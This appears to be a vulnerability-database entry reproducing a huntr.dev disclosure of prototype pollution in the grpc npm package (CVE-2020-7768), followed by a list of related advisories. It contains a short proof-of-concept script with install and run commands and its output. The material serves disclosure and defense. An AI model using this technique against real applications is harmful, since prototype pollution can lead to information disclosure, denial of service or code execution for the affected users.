Lucene search
D3v53c2-NPM-GRPCHistoryJan 26, 2021 - 12:00 a.m.
Prototype Pollution in grpc/grpc-node
2021-01-2600:00:00
d3v53c
www.huntr.dev
18
grpc
prototype pollution
information disclosure
dos
rce
vulnerable package
poc
npm installation
output
EPSS
0.005
Percentile
77.6%
Description
grpc native core package is vulnerable to Prototype Pollution.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
Proof of Concept
- Create the following PoC file:
// poc.js
var grpc =require('grpc')
grpc.loadPackageDefinition({'constructor.prototype.polluted': "Yes! Its Polluted"});
console.log({}.polluted)
- Execute the following commands in another terminal:
npm i grpc # Install affected module
node poc.js # Run the PoC
- Check the Output:
[Function: ServiceClient] { service: 'Yes! Its Polluted' }
Related
nodejs
nodejs
Prototype Pollution
2021-05-10 19:18:00
prion
prion
Design/Logic Flaw
2020-11-11 11:15:00
nessus
nessus
Photon OS 2.0: Grpc PHSA-2020-2.0-0305
2020-12-15 00:00:00
Photon OS 3.0: Grpc PHSA-2020-3.0-0176
2020-12-15 00:00:00
photon
photon
Important Photon OS Security Update - PHSA-2020-0176
2020-12-11 00:00:00
Home
Download Photon OS
User Documentation
FAQ
Security Advisories
Related Information
Lightwave - PHSA-2020-2.0-0305
2020-12-11 00:00:00
Critical Photon OS Security Update - PHSA-2020-3.0-0176
2020-12-11 00:00:00
cve
cve
CVE-2020-7768
2020-11-11 11:15:10
redhatcve
redhatcve
CVE-2020-7768
2020-11-12 13:24:31
cvelist
cvelist
CVE-2020-7768 Prototype Pollution
2020-11-11 10:20:16
github
github
Prototype pollution in grpc and @grpc/grpc-js
2021-05-10 19:16:14
osv
osv
CVE-2020-7768
2020-11-11 11:15:10
Prototype pollution in grpc and @grpc/grpc-js
2021-05-10 19:16:14
veracode
veracode
Prototype Pollution
2020-11-12 01:03:39
nvd
nvd
CVE-2020-7768
2020-11-11 11:15:10
